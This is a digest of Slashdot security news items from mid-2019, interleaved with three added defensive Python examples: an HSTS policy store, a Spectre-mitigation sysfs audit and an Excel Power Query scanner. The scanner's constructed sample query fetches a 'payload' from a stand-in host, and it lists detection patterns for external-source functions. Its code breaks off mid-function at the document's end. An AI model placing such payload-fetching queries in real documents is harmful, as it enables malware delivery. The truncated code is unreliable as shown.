Slashdot security articles


Florida City Fires IT Employee After Paying Ransom Demand Last Week

Mon, 07/01/2019 - 17:25
Officials from Lake City, Florida, fired an IT employee last week after the city was forced to approve a ransomware payment of nearly $500,000 the previous Monday. The employee, whose name was not released, was fired on Friday, according to local media reports citing the Lake City mayor. ZDNet reports: Lake City's IT network was infected with malware on June 10. The city described the incident as a "triple threat." In reality, an employee opened a document received via email, which infected the city's network with the Emotet trojan, which in turn downloaded the TrickBot trojan and, later, the Ryuk ransomware. The ransomware spread to the city's entire IT network and encrypted files, and the attackers then demanded a ransom to let the city regain access to its systems. The city's leadership approved the payment last Monday; it was paid the next day, on Tuesday, and the city's IT staff started decrypting files that same day.

Germany To Publish Standard on Modern Secure Browsers

Mon, 07/01/2019 - 12:01
Germany's cyber-security agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. From a report: The new guidelines are currently being drafted by the German Federal Office for Information Security (the Bundesamt für Sicherheit in der Informationstechnik, BSI), and they'll be used to advise government agencies and private-sector companies on which browsers are safe to use. A first version of this guideline was published in 2017, but a new standard is being put together to account for security measures added to modern browsers since then, such as HSTS, SRI, CSP 2.0, telemetry handling, and improved certificate handling mechanisms, all mentioned in a new draft released for public comment last week. According to the BSI's draft, to be considered "secure" a modern browser must, among other requirements: support TLS; ship with a list of trusted certificates; support extended validation (EV) certificates; verify loaded certificates against a Certificate Revocation List (CRL) or via the Online Certificate Status Protocol (OCSP); use icons or color highlights to show whether communication with a remote server is encrypted or in plaintext; allow connections to websites running on expired certificates only after specific user approval; and support HTTP Strict Transport Security (HSTS, RFC 6797). Further reading: Germany and the Netherlands To Build the First Ever Joint Military Internet.
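Two of the draft requirements above, HSTS (RFC 6797) and user approval for expired certificates, interact in a way that is easy to get wrong: once a host is a known HSTS host, RFC 6797 section 8.4 requires the browser to terminate the connection on any certificate error with no click-through at all, so the "user approval" path must not be offered for such hosts. The block below is an added example, not code from the BSI draft or from any browser. It implements a minimal HSTS policy store: it parses the Strict-Transport-Security header as section 6.1 specifies (max-age required, directive names case-insensitive, duplicate directives reject the header, unknown directives such as preload are ignored), honours the header only over TLS, applies includeSubDomains matching and expiry, upgrades http:// URLs for known hosts, and answers whether a certificate-error click-through may be offered. All header values and host names are constructed samples.

```python
"""Minimal HSTS (RFC 6797) policy store. Added example; constructed inputs,
no network access."""
import re
import time


def parse_sts(header):
    """Parse a Strict-Transport-Security value.

    Returns (max_age_seconds, include_subdomains) or None when the header
    must be ignored (RFC 6797 6.1: max-age required, no duplicate directives).
    """
    max_age = None
    include_sub = False
    seen = set()
    for directive in header.split(";"):
        directive = directive.strip()
        if not directive:
            continue
        name, _, value = directive.partition("=")
        name = name.strip().lower()
        if name in seen:
            return None                      # duplicate directive: ignore header
        seen.add(name)
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', value.strip())   # quoted-string allowed
            if not m:
                return None
            max_age = int(m.group(1))
        elif name == "includesubdomains":
            include_sub = True
        # any other directive (e.g. preload) is ignored per 6.1
    if max_age is None:
        return None
    return max_age, include_sub


class HstsStore:
    def __init__(self, now=time.time):
        self._now = now
        self._hosts = {}          # host -> (expiry_timestamp, include_subdomains)

    def observe(self, host, header, over_tls=True):
        """Record a policy from a response; RFC 6797 8.1: only over a secure,
        error-free connection. max-age=0 removes an existing policy."""
        if not over_tls:
            return False
        parsed = parse_sts(header)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        host = host.lower().rstrip(".")
        if max_age == 0:
            self._hosts.pop(host, None)
            return True
        self._hosts[host] = (self._now() + max_age, include_sub)
        return True

    def is_known(self, host):
        """RFC 6797 8.2/8.3: exact match, or an unexpired superdomain policy
        that carries includeSubDomains."""
        host = host.lower().rstrip(".")
        now = self._now()
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry <= now:
                continue                      # expired policy no longer applies
            if i == 0 or include_sub:
                return True
        return False

    def rewrite(self, url):
        """RFC 6797 8.3: rewrite http:// to https:// for known hosts; port 80
        becomes the https default, any other explicit port is preserved."""
        m = re.match(r"^http://([^/:]+)(?::(\d+))?(/.*)?$", url)
        if not m:
            return url
        host, port, path = m.groups()
        if not self.is_known(host):
            return url
        port_part = "" if port in (None, "80") else ":" + port
        return "https://" + host + port_part + (path or "")


def may_offer_click_through(store, host):
    """RFC 6797 8.4: a known HSTS host gets no user recourse on TLS errors,
    so the 'proceed anyway' path for an expired certificate is only legal
    for hosts without a policy."""
    return not store.is_known(host)


if __name__ == "__main__":
    store = HstsStore()
    store.observe("example.com", "max-age=31536000; includeSubDomains")
    print(store.rewrite("http://api.example.com/login"))
    print("click-through allowed:", may_offer_click_through(store, "example.com"))
```

The expiry clock is injectable so the store can be tested deterministically; in a real browser the store is persisted and also pre-seeded from the preload list, which this example does not model.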

Linux Usage on Azure Has Surpassed Windows, Microsoft Developer Reveals

Mon, 07/01/2019 - 08:00
An anonymous reader shares a report: Three and a half years ago, Mark Russinovich, CTO of Azure, Microsoft's cloud, said, "One in four [Azure] instances are Linux." Next, in 2017, Microsoft revealed that 40% of Azure virtual machines (VMs) were Linux-based. Then in the fall of 2018, Scott Guthrie, Microsoft's executive VP of the cloud and enterprise group, told me in an exclusive interview, "About half of Azure VMs are Linux." Now, Sasha Levin, a Microsoft Linux kernel developer, in a request that Microsoft be allowed to join a Linux security list, revealed that "the Linux usage on our cloud has surpassed Windows." Shocking, you say? Not really. Linux is largely what runs enterprise computing, both on in-house servers and in the cloud. Windows Server has been declining for years. In the most recent IDC Worldwide Operating Systems and Subsystems Market Shares report, covering 2017, Linux had 68% of the market. Its share has only increased since then.

An Automation Tipping Point? The Rise of 'Robotics as a Service'

Sun, 06/30/2019 - 17:34
"Robotics-as-a-service (RaaS) is about to eat the world of work," argues Hooman Radfar, a partner at the startup studio Expa who's been "actively investing in and looking for new companies" catalyzing the change. Companies buy massive robots and software solutions that are customized -- at great cost -- to their specific needs. The massive conglomerates that sell these robots have dominated the field for decades, but that is about to change. One major factor driving this change is how dramatically globalization has reduced hardware production costs and capabilities. At the same time, cheap and powerful computing and cloud infrastructure are now also readily available and easy to spin up. As a result, vertical-specific, robot-powered solutions can today be offered as variable-cost services rather than being sold at a fixed cost. Just as cable companies include the costs of set-top boxes in their monthly bill, robots and their associated software will be bundled together and sold in a subscription package. This change to the robotics business model will have profound implications, radically transforming markets and at the same time changing the future of work. With a new variable-cost model in place as a result of subscription packages, it's simple to calculate when a market is about to tip to favor RaaS. A market has hit its automation tipping point when a RaaS solution is introduced with a unit cost that is less than or equal to the unit cost for humans-in-the-loop to conduct the same task... One market that has already reached its automation tipping point is the enterprise building security market... Crop dusting ($70 billion), industrial cleaning ($78 billion), warehouse management ($21 billion), and many more service markets are tipping. When these sectors hit their automation tipping point, we will see the same level of industry disruption currently taking place in the building security market. 
The changes taking place in the enterprise will also deeply impact consumer markets, and ultimately society, in profound and potentially challenging ways. We are at the start of a massive shift in how work gets done. One study predicted the worldwide RaaS market would be $34.7 within three years, according to the article, which also explores how the building security market is already being disrupted. "Instead of manning a building with three to four people, you can have one human managing a few remote robots" -- at a cost that's 30% cheaper. "Moreover, all the data and insights collected via these robots is organized and made available for building and security optimization. It isn't just cheaper, it's better. There's no turning back -- this market has hit its automation tipping point."

Ask Slashdot: What's Your 'Backup' Browser?

Sun, 06/30/2019 - 15:34
Slashdot's gotten over 17,000 votes in its poll about which web browser people use on their desktop. (The current leader? Firefox, with 53% of the vote, followed by Chrome with 30%.) But Slashdot reader koavf asks an interesting follow-up question: "What's everyone's go-to Plan B browser and why?" To start the conversation, here's how James Gelinas (a contributor at Kim Komando's tech advice site) recently reviewed the major browsers: He calls Chrome "a safe, speedy browser that's compatible with nearly every page on the internet" but also says that Chrome "is notorious as a resource hog, and it can drastically slow your computer down if you have too many tabs open." "Additionally, the perks of having your Google Account connected to your browser can quickly turn into downsides for the privacy-minded among us. If you're uncomfortable with your browser knowing your searching and spending behaviors, Chrome may not be the best choice for you." He calls Firefox "the choice for safety". "Predating Chrome by 6 years, Firefox was the top choice for savvy Netizens in the early Aughts. Although Chrome has captured a large segment of its user base, that doesn't mean the Fox is bad. In fact, Mozilla is greatly appreciated by fans and analysts for its steadfast dedication to user privacy... Speedwise, Firefox isn't a slouch either. The browser is lighter weight than Chrome and is capable of loading some websites even faster." He calls Apple's Safari and Microsoft Edge "the default choice...because both of these browsers come bundled with new computers." "Neither one has glaring drawbacks, but they tend to lack some of the security features and extensions found in more popular browsers. Speedwise, however, both Edge and Safari are able to gain the upper hand against their competition. When it comes to startup time and functions, the apps are extremely lightweight on your system's resources. 
This is because they're part of the Mac and Windows operating systems, respectively, and are optimized for performance in that environment." Finally, he gives the Tor browser an honorable mention. ("It's still one of the best anonymous web browsers available. It's so reliable, in fact, that people living under repressive governments often turn to it for their internet needs -- installing it on covert USB sticks to use on public computers.") And he awards a "dishonorable mention" to Internet Explorer. ("Not only is the browser no longer supported by Microsoft, but it's also vulnerable to a host of malware and adware threats.") But what do Slashdot's readers think? Putting aside your primary desktop browser -- what's your own go-to "Plan B" web browser, and why? Leave your best answers in the comments. What's your "backup" browser?

Linus Torvalds Sees Lots of Hardware Headaches Ahead

Sun, 06/30/2019 - 07:34
Linux founder Linus Torvalds "warns that managing software is about to become a lot more challenging, largely because of two hardware issues that are beyond the control of DevOps teams," according to a report, shared by an anonymous reader, on Torvalds' remarks at the KubeCon + CloudNativeCon + Open Source Summit China conference: The first, Torvalds said, is the steady stream of patches being generated for new cybersecurity issues related to the speculative execution model that Intel and other processor vendors rely on to accelerate performance... Each of those bugs requires another patch to the Linux kernel that, depending on when it arrives, can require painful updates to the kernel, Torvalds told conference attendees. Short of disabling hyperthreading altogether to eliminate reliance on speculative execution, each patch requires organizations to update both the Linux kernel and the BIOS to ensure security. Turning off hyperthreading eliminates the patch management issue, but also reduces application performance by about 15 percent. The second major hardware issue looms a little further over the horizon, Torvalds said. Moore's Law has guaranteed a doubling of hardware performance every 18 months for decades. But as processor vendors approach the limits of Moore's Law, many developers will need to reoptimize their code to continue achieving increased performance. In many cases, that requirement will be a shock to many development teams that have counted on those performance improvements to make up for inefficient coding processes, he said.
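The kernel reports the state the report is talking about, per issue, under /sys/devices/system/cpu/vulnerabilities/, and the SMT (hyperthreading) state under /sys/devices/system/cpu/smt/. One caveat worth keeping in mind when reading the report's paraphrase: switching SMT off removes the cross-thread leakage that the kernel flags as "SMT vulnerable" for issues such as L1TF and MDS, but it does not turn speculative execution off, and the per-issue mitigations (and the microcode updates some of them depend on) are still required. The script below is an added example, not part of the report or of any kernel tooling: it reads those sysfs files, classifies each entry from the kernel's own wording ("Not affected", "Mitigation: ...", "Vulnerable..."), and lists what still needs attention. The sysfs root is a parameter, and the sample tree it audits by default is constructed in a temporary directory with strings in the kernel's format, not captured from a real host.

```python
"""Summarise speculative-execution mitigation state from sysfs.
Added example; the sample tree is constructed, not captured from a host."""
import os
import sys
import tempfile

VULN_DIR = "devices/system/cpu/vulnerabilities"
SMT_DIR = "devices/system/cpu/smt"


def _read(path):
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return None            # file absent on older kernels or unaffected arches


def classify(status):
    """Map one vulnerability file's text to a coarse class.

    l1tf, mds and tsx_async_abort append 'SMT vulnerable' when the mitigation
    is active but sibling hyperthreads can still leak; that is reported
    separately because disabling SMT is the only way to close it."""
    if status is None:
        return "unknown"
    if status.startswith("Not affected"):
        return "not_affected"
    if status.startswith("Mitigation:"):
        return "mitigated_smt_exposed" if "SMT vulnerable" in status else "mitigated"
    if status.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def audit(sysfs_root="/sys"):
    """Return {'vulnerabilities': {name: (class, raw_text)}, 'smt': {...}}."""
    vuln_dir = os.path.join(sysfs_root, VULN_DIR)
    report = {"vulnerabilities": {}, "smt": {}}
    if os.path.isdir(vuln_dir):
        for name in sorted(os.listdir(vuln_dir)):
            raw = _read(os.path.join(vuln_dir, name))
            report["vulnerabilities"][name] = (classify(raw), raw)
    # smt/control: on, off, forceoff, notsupported or notimplemented; smt/active: 0 or 1
    report["smt"]["control"] = _read(os.path.join(sysfs_root, SMT_DIR, "control"))
    report["smt"]["active"] = _read(os.path.join(sysfs_root, SMT_DIR, "active"))
    return report


def needs_attention(report):
    """Entries that are unmitigated, or mitigated only while SMT leaks remain."""
    return [name for name, (cls, _) in report["vulnerabilities"].items()
            if cls in ("vulnerable", "mitigated_smt_exposed")]


# Constructed sample in the kernel's wording (assumption: not from a real host).
SAMPLE = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: usercopy/swapgs barriers and __user pointer sanitization",
    "spectre_v2": "Vulnerable, IBPB: disabled, STIBP: disabled",
    "l1tf": "Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable",
    "mds": "Mitigation: Clear CPU buffers; SMT vulnerable",
    "spec_store_bypass": "Not affected",
}


def sample_audit():
    """Write SAMPLE into a temporary sysfs-like tree and audit it."""
    root = tempfile.mkdtemp()
    vuln_dir = os.path.join(root, VULN_DIR)
    smt_dir = os.path.join(root, SMT_DIR)
    os.makedirs(vuln_dir)
    os.makedirs(smt_dir)
    for name, text in SAMPLE.items():
        with open(os.path.join(vuln_dir, name), "w") as f:
            f.write(text + "\n")
    with open(os.path.join(smt_dir, "control"), "w") as f:
        f.write("on\n")
    with open(os.path.join(smt_dir, "active"), "w") as f:
        f.write("1\n")
    report = audit(root)
    return report, needs_attention(report)


if __name__ == "__main__":
    # Usage: mitigations.py [sysfs-root]; with no argument the live /sys is read.
    rep = audit(sys.argv[1] if len(sys.argv) > 1 else "/sys")
    for name, (cls, raw) in rep["vulnerabilities"].items():
        print(f"{name:20} {cls:22} {raw}")
    print("SMT control:", rep["smt"]["control"], "active:", rep["smt"]["active"])
    print("needs attention:", ", ".join(needs_attention(rep)) or "none")
```

Run it on a fleet after each kernel or BIOS update; an entry that stays "Vulnerable" after a kernel update usually means the microcode the mitigation depends on has not been applied, which is the BIOS half of the update the report describes.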

Nokia's CTO Accuses Huawei of Both 'Sloppiness' and 'Real Obfuscation'

Sun, 06/30/2019 - 06:34
Nokia's CTO Marcus Weldon "told the BBC that the UK should be wary of using the Chinese hardware" -- though Nokia rushed to assure the BBC that Weldon's remarks do "not reflect the official position of Nokia." Forbes reports: On the security front, Weldon referred to analysis suggesting Huawei equipment was far more likely to have vulnerabilities than technology from Nokia or Ericsson. "We read those reports and we think okay, we're doing a much better job than they are," Weldon said, describing Huawei's failings as serious and claiming Nokia's alternatives to be a safer bet. "Some of it seems to be just sloppiness, honestly, that they haven't patched things, they haven't upgraded. But some of it is real obfuscation, where they make it look like they have the secure version when they don't...." The comments from Nokia's CTO came in light of research from Finite State, which published a scathing report claiming that "Huawei devices quantitatively pose a high risk to their users. In virtually all categories we examined, Huawei devices were found to be less secure than those from other vendors making similar devices." And this included the potential backdoors that lie at the heart of the U.S. government's security case against the Chinese company. "Out of all the firmware images analyzed, 55% had at least one potential backdoor," Finite State found. "These backdoor access vulnerabilities allow an attacker with knowledge of the firmware and/or with a corresponding cryptographic key to log into the device." Nokia's later statement insisted that their company "is focused on the integrity of its own products and services and does not have its own assessment of any potential vulnerabilities associated with its competitors."

Sting Finds Ransomware Data Recovery Firms Are Just Paying The Ransom

Sat, 06/29/2019 - 23:34
"ProPublica recently reported that two U.S. firms, which professed to use their own data recovery methods to help ransomware victims regain access to infected files, instead paid the hackers. Now there's new evidence that a U.K. firm takes a similar approach." An anonymous reader quotes their report: Fabian Wosar, a cyber security researcher, told ProPublica this month that, in a sting operation he conducted in April, Scotland-based Red Mosquito Data Recovery said it was "running tests" to unlock files while actually negotiating a ransom payment. Wosar, the head of research at anti-virus provider Emsisoft, said he posed as both hacker and victim so he could review the company's communications to both sides. Red Mosquito Data Recovery "made no effort to not pay the ransom" and instead went "straight to the ransomware author literally within minutes," Wosar said. "Behavior like this is what keeps ransomware running." Since 2016, more than 4,000 ransomware attacks have taken place daily, or about 1.5 million per year, according to statistics posted by the U.S. Department of Homeland Security. Law enforcement has failed to stem ransomware's spread, and culprits are rarely caught... But clients who don't want to give in to extortion are susceptible to firms that claim to have their own methods of decrypting files. Often, victims are willing to pay more than the ransom amount to regain access to their files if they believe the money is going to a data recovery firm rather than a hacker, Wosar said. Red Mosquito charged its client four times the actual ransom amount, according to the report -- though after ProPublica followed up, the company "did not respond to emailed questions, and hung up when we called the number listed on its website." The company then also "removed the statement from its website that it provides an alternative to paying hackers. 
It also changed 'honest, free advice' to 'simple free advice,' and the 'hundreds' of ransomware cases it has handled to 'many.'"

AMD Cites 'Factual Errors', 'Omissions' in Critical Report on Its China Venture

Sat, 06/29/2019 - 15:34
Thursday the Wall Street Journal wrote a piece about AMD's joint venture with Chinese holding company THATIC -- titled "How a Big U.S. Chip Maker Gave China the 'Keys to the Kingdom'." The article argues that AMD "essentially granted China access to advanced processor IP that could be used to threaten U.S. national security," reports Forbes. But it adds that the same day, AMD executive Harry Wolin wrote an angry blog post in response, complaining that the story "contains several factual errors and omissions and does not portray an accurate picture." Forbes reports: From Wolin's post, "Starting in 2015, AMD diligently and proactively briefed the Department of Defense, the Department of Commerce and multiple other agencies within the U.S. Government before entering into the joint ventures. AMD received no objections whatsoever from any agency to the formation of the joint ventures or to the transfer of technology -- technology which was of lower performance than other commercially available processors. In fact, prior to the formation of the joint ventures and the transfer of technology, the Department of Commerce notified AMD that the technology proposed was not restricted or otherwise prohibited from being transferred. Given this clear feedback, AMD moved ahead with the joint ventures." Not only does AMD claim it had the green light from multiple government entities to enter into the deal, the post claims that the WSJ article is simply wrong. "The Wall Street Journal story omits important factual details, including the fact that AMD put significant protections in place to protect its intellectual property (IP) and prevent valuable IP from being misused or reverse engineered to develop future generations of processors."

Microsoft Claims Unauthorized Repairing of Its Devices Would Be a Security Risk

Sat, 06/29/2019 - 11:41
In comments submitted to America's Federal Trade Commission, Microsoft says repairing its devices could jeopardize protections from the Trusted Platform Module (TPM) security chip. "Don't believe them," argues a group of information security professionals who support the right to repair. Slashdot reader chicksdaddy quotes their report: The statement was submitted ahead of Nixing the Fix, an FTC workshop on repair restrictions that is scheduled for mid-July... "The unauthorized repair and replacement of device components can result in the disabling of key hardware security features or can impede the update of firmware that is important to device security or system integrity," Microsoft wrote... "If the TPM or other hardware or software protections were compromised by a malicious or unqualified repair vendor, those security protections would be rendered ineffective and consumers' data and control of the device would be at risk. Moreover, a security breach of one device can potentially compromise the security of a platform or other devices connected to the network...." As we know: Firms like Microsoft, Lexmark, LG, Samsung and others use arguments like this all the time and then not too subtly imply that their authorized repair professionals are more trustworthy and honest than independent competitors. But that's just hot air. They have no data to back up those assertions and there's no way that their repair technicians are more trustworthy than owners, themselves... There's nothing inherent in repair or the things called for in right to repair laws like providing diagnostic software, diagnostic codes, schematics and replacement parts that puts the integrity of the TPM or the trust model it anchors at risk. Nor does the TPM require that the devices it secures remain pristine: using the same hardware and software configuration as when they were sold by the OEM. After all, TPMs are in Dell computers. 
Dell makes diagnostic software and diagnostic codes and schematics available for their hardware and I haven't heard Microsoft or anybody else suggest that a TPM on a repairable Dell laptop is any less secure than the TPM on an unrepairable Microsoft Surface.

Trump Relaxes US Ban On Selling To Huawei In Surprise G20 Concession

Sat, 06/29/2019 - 09:34
hackingbear tipped us off to a breaking news story. CNN reports: US President Donald Trump has appeared to soften his tone on Chinese communications giant Huawei, suggesting that he would allow the company to once again purchase U.S. technology. Speaking at a press conference in Osaka on Saturday, Trump said that the U.S. sells a "tremendous amount of product" to Huawei. "That's okay, we will keep selling that product," said Trump. "The (U.S.) companies were not exactly happy that they couldn't sell." Forbes points out "While it's not a lifting of the blanket ban, it will significantly benefit the Chinese manufacturer." ZDNet reports: This news just broke with comments made by Trump, including "U.S. companies can sell their equipment to Huawei. We're talking about equipment where there's no great national security problem with it." The details of this statement are still pending, but it is likely that 5G infrastructure equipment may still not be part of this access deal, while the smartphone segment may be where we see open access. One Daily Beast contributor argues the action "appears to be a surrender to publicly issued Chinese demands." But TechCrunch writes that "any mutual trust has been broken and things are unlikely to be the same again."

New Mac Malware Abuses Recently Disclosed Gatekeeper Zero-Day

Sat, 06/29/2019 - 02:00
puddingebola writes: In May, security researcher Filippo Cavallarin made public a vulnerability in macOS's Gatekeeper. The vulnerability can allow an attacker to use a symlink and an NFS server to bypass Gatekeeper's authentication and run malicious code. The malware has been named OSX/Linker and has been tied to the same group that operates the OSX/Surfbuyer adware. All macOS versions are affected, including the latest 10.14.5, and Apple has yet to release a patch to this day, a full month after Cavallarin's public disclosure.

Italy Stings Facebook With $1.1 Million Fine For Cambridge Analytica Data Misuse

Fri, 06/28/2019 - 18:02
Italy's data protection watchdog has slapped Facebook with a $1.1 million fine for violations of local privacy law attached to the Cambridge Analytica data misuse scandal. TechCrunch reports: Last year it emerged that up to 87 million Facebook users had had their data siphoned out of the social media giant's platform by an app developer working for the controversial (and now defunct) political data company, Cambridge Analytica. The offences in question occurred prior to Europe's tough new data protection framework, GDPR, coming into force -- hence the relatively small size of the fine in this case, which has been calculated under Italy's prior data protection regime. (Whereas fines under GDPR can scale as high as 4% of a company's annual global turnover.) A Facebook spokesperson issued the following statement: "We have said before that we wish we had done more to investigate claims about Cambridge Analytica in 2015. However, evidence indicates that no Italian user data was shared with Cambridge Analytica. Dr Kogan only shared data with Cambridge Analytica in relation to U.S. users. We made major changes to our platform back then and have also significantly restricted the information which app developers can access. We're focused on protecting people's privacy and have invested in people, technology and partnerships, including hiring more than 20,000 people focused on safety and security over the last year. We will review the Garante's decision and will continue to engage constructively with their concerns."

NSA Improperly Collected US Phone Call Data After Saying Problem Was Fixed

Fri, 06/28/2019 - 14:40
An anonymous reader quotes a report from USA Today: The National Security Agency improperly collected phone call records of Americans last fall, months after a previous breach that compelled the agency to destroy millions of records from the contentious program, documents released Wednesday revealed. The redacted documents, obtained by the ACLU in a Freedom of Information Act lawsuit, do not indicate how many records NSA improperly collected in the October breach, nor which telecommunications provider submitted the improper data. "These documents provide further evidence that the NSA has consistently been unable to operate the call detail record program within the bounds of the law," the ACLU said in a letter to Congress this week lobbying for an end to the program. The letter says elements within the Office of the Director of National Intelligence concluded the October violations had a "significant impact" on privacy and civil rights, but that the Americans affected were not told of the breach.

Firefox To Get a Random Password Generator, Like Chrome and Safari

Fri, 06/28/2019 - 14:00
Mozilla is adding a random password generator to Firefox. From a report: The Firefox random password generator is expected to become publicly available for all Firefox users with the release of Firefox 69, scheduled for early September, roughly a year after Chrome 69 shipped the equivalent feature. Currently, the random password generator is only available in Firefox Nightly, the Firefox version used for testing new features before they land in the stable branch. When Firefox 69 is released, the random password generator is expected to be available as a checkbox in the Firefox settings section, under "Privacy & Security," under "Logins and Passwords."

FBI Urges Universities To Monitor Some Chinese Students And Scholars In the US

Fri, 06/28/2019 - 12:01
U.S. intelligence agencies are encouraging American research universities to develop protocols for monitoring students and visiting scholars from Chinese state-affiliated research institutions, as U.S. suspicion toward China spreads to academia. From a report: Since last year, FBI officials have visited at least 10 members of the Association of American Universities, a group of 62 research universities, with an unclassified list of Chinese research institutions and companies. Universities have been advised to monitor students and scholars associated with those entities on American campuses, according to three administrators briefed at separate institutions. FBI officials have also urged universities to review ongoing research involving Chinese individuals that could have defense applications, the administrators say. "We are being asked what processes are in place to know what labs they are working at or what information they are being exposed to," Fred Cate, vice president of research at Indiana University, tells NPR. "It's not a question of just looking for suspicious behavior -- it's actually really targeting specific countries and the people from those countries." In a statement responding to NPR's questions, the FBI said it "regularly engages with the communities we serve. As part of this continual outreach, we meet with a wide variety of groups, organizations, businesses, and academic institutions. The FBI has met with top officials from academia as part of our ongoing engagement on national security matters."

Microsoft Seeks To Join the Official Linux-Distros Mailing List

Fri, 06/28/2019 - 11:21
Microsoft's transformation into a fully paid-up member of the Linux love-train continued this week as the Windows giant sought to join the exclusive club that is the official linux-distros mailing list. From a report: The linux-distros list is used by Linux distributions to privately report, coordinate, and discuss security issues yet to reach the general public; oss-security is there for stuff that is already out in the open or cannot wait for things to bounce around for a few days first. Sasha Levin, who describes himself as a "Linux kernel hacker" at the beast of Redmond, made the application for his employer to join the list, which if approved would allow Microsoft to tap into private behind-the-scenes chatter about vulnerabilities, patches, and ongoing security issues with the open-source kernel and related code. These discussions are crucial for getting an early heads-up, and for coordinating the handling and deployment of fixes before they are made public. To demonstrate that Microsoft qualifies for membership alongside the likes of Ubuntu, Debian, and SUSE, he cited Microsoft's Azure Sphere and the Windows Subsystem for Linux (WSL) 2 as examples of distro-like builds.

FDA Warns About Insulin Pump Cybersecurity

Fri, 06/28/2019 - 08:41
Something new for diabetes patients to worry about: Someone nearby could potentially connect wirelessly to your Medtronic MiniMed insulin pump, the FDA warned yesterday. From a report: They could then change the pump's settings, causing it to deliver too much or too little insulin to the patient. While the agency said that, as far as it knows, no one has actually hacked into someone else's insulin pump and harmed them, this is the future of health care cyber risk. The agency said that patients using certain models of the pump should switch to less vulnerable ones.

Trump White House Reportedly Debating Encryption Policy Behind Closed Doors

Thu, 06/27/2019 - 18:02
According to a report in Politico, the Trump administration held a National Security Council meeting on Wednesday that weighed the challenges and benefits of encryption. "One of Politico's sources said that the meeting was split into two camps: Decide, create and publicize the administration's position on encryption or go so far as to ask Congress for legislation to ban end-to-end encryption," reports Gizmodo. From the report: That would be a huge escalation in the encryption fight and, moreover, would probably be unsuccessful due to a lack of willpower in Congress. No decision was made by the Trump administration officials, Politico reported. The White House did not respond to a request for comment. The fact that these discussions are ongoing both within the White House and with Silicon Valley shows that the issue is still very much alive within the corridors of power.

Microsoft Excel Power Query Feature Can Be Abused For Malware Distribution

Thu, 06/27/2019 - 17:25
Security researchers have devised a method to abuse a legitimate Microsoft Excel technology named Power Query to run malicious code on users' systems with minimal interaction. ZDNet reports: Power Query is a data connection technology that can allow Excel files to discover, connect, combine, and manipulate data before importing it from remote sources, such as an external database, text document, another spreadsheet, or a web page. The tool is included with recent versions of Excel and available as a separate downloadable add-in for older Excel versions. In research published today and shared with ZDNet, Ofir Shlomo, a security researcher with the Mimecast Threat Center, described a technique through which Power Query features could be abused to run malicious code on users' systems. The technique relies on creating malformed Excel documents that use Power Query to import data from an attacker's remote server. "Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened," Shlomo said. "The malicious code could be used to drop and execute malware that can compromise the user's machine." Mimecast's technique can even bypass security sandboxes that analyze documents sent via email before allowing users to download and open them. Microsoft has yet to issue a fix for the vulnerability, but did release an advisory document for users, offering a way to beef up security.
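Anyone triaging a suspicious spreadsheet wants to know what Power Query will fetch before Excel ever opens it, and that can be read straight out of the file. The script below is an added example, not Mimecast's research code and not anything from Microsoft. It treats the .xlsx as the ZIP it is, looks for the Power Query provider string (Microsoft.Mashup.OleDb.1) in xl/connections.xml, decodes the DataMashup payload from the customXml part (MS-QDEFF layout: a 4-byte version, a 4-byte package length, then a nested ZIP whose Formulas/Section1.m holds the M query code), and reports which external-source functions and URLs the queries use. The sample workbook, its M code and the host example.invalid are constructed in memory so the script runs offline; the set of functions treated as "external" is my own selection, not a Microsoft list.

```python
"""Find Power Query (DataMashup) queries and their remote sources in an .xlsx.
Added example; sample workbook is constructed in memory."""
import base64
import io
import re
import struct
import sys
import zipfile

# Assumption: M functions whose presence means the query reaches outside the file.
EXTERNAL_FUNCS = (
    "Web.Contents", "Web.Page", "Web.BrowserContents",
    "OleDb.DataSource", "OleDb.Query", "Odbc.DataSource", "Odbc.Query",
    "Sql.Database", "File.Contents", "Folder.Files",
)
URL_RE = re.compile(r'https?://[^"\s)]+')
MASHUP_RE = re.compile(r"<DataMashup[^>]*>(.*?)</DataMashup>", re.DOTALL)


def extract_mashup_package(datamashup_b64):
    """Decode the DataMashup text and return the inner package ZIP bytes."""
    blob = base64.b64decode("".join(datamashup_b64.split()))
    version, parts_len = struct.unpack_from("<II", blob, 0)   # MS-QDEFF header
    if version != 0 or parts_len > len(blob) - 8:
        raise ValueError("unexpected DataMashup header")
    return blob[8:8 + parts_len]


def read_m_sections(package_bytes):
    """Return {part name: M code} for every Formulas/*.m in the package."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if name.startswith("Formulas/") and name.endswith(".m"):
                out[name] = pkg.read(name).decode("utf-8", "replace")
    return out


def scan_xlsx(data):
    """Scan raw .xlsx bytes; returns a findings dict (no network access)."""
    findings = {"mashup_connection": False, "queries": []}
    with zipfile.ZipFile(io.BytesIO(data)) as wb:
        for name in wb.namelist():
            if name == "xl/connections.xml":
                if "Microsoft.Mashup.OleDb" in wb.read(name).decode("utf-8", "replace"):
                    findings["mashup_connection"] = True
            elif name.startswith("customXml/") and name.endswith(".xml"):
                xml = wb.read(name).decode("utf-8", "replace")
                for m in MASHUP_RE.finditer(xml):
                    for part, code in read_m_sections(extract_mashup_package(m.group(1))).items():
                        findings["queries"].append({
                            "part": f"{name}:{part}",
                            "external_functions": [f for f in EXTERNAL_FUNCS if f in code],
                            "urls": URL_RE.findall(code),
                        })
    return findings


def is_suspicious(findings):
    """Any query that reaches outside the workbook is worth a look."""
    return any(q["external_functions"] or q["urls"] for q in findings["queries"])


# --- constructed sample workbook (not a real malicious document) -------------
SAMPLE_M = (
    "section Section1;\n\n"
    "shared Query1 = let\n"
    '    Source = Web.Contents("http://example.invalid/payload")\n'
    "in\n    Source;\n"
)


def build_datamashup(m_code):
    """Pack M code into a DataMashup payload: header, package ZIP, then the
    Permissions, Metadata and PermissionBindings sections left empty."""
    pkg = io.BytesIO()
    with zipfile.ZipFile(pkg, "w") as z:
        z.writestr("Formulas/Section1.m", m_code)
    parts = pkg.getvalue()
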